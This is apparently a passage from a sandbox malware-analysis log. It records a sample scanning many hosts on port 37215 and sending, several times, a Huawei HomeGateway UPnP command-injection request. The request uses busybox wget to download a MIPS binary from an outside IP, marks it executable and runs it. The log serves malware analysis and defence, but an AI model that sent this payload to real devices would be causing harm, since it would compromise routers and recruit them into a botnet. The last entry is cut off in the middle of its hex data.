                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 41.160.131.122:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 197.239.116.59:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 41.67.22.20:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 197.79.36.98:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 41.100.116.144:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 197.175.137.231:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 156.33.122.105:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 156.65.112.20:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 197.170.252.205:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 41.4.30.165:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 41.133.233.14:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 156.31.135.207:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 41.99.95.24:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 156.88.226.133:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 156.86.252.128:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 156.224.159.111:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 41.213.212.237:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 156.202.150.224:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 156.3.188.252:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 41.198.119.197:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 197.97.24.26:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 156.208.48.118:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 197.199.250.147:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 156.179.133.0:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 197.112.147.232:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 41.248.22.0:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 156.214.111.110:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 41.175.239.199:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 197.15.57.149:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 156.157.145.42:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 156.240.147.158:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 197.36.122.28:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 156.123.141.1:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 156.191.85.116:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 41.39.86.91:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 41.36.144.189:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 156.215.194.77:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 41.163.246.99:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 197.69.119.231:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 197.122.119.98:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 41.25.184.121:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 41.110.206.113:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 156.14.141.196:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 156.152.207.55:37215
                Source: global trafficTCP traffic: 192.168.2.14:6611 -> 156.183.202.248:37215
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 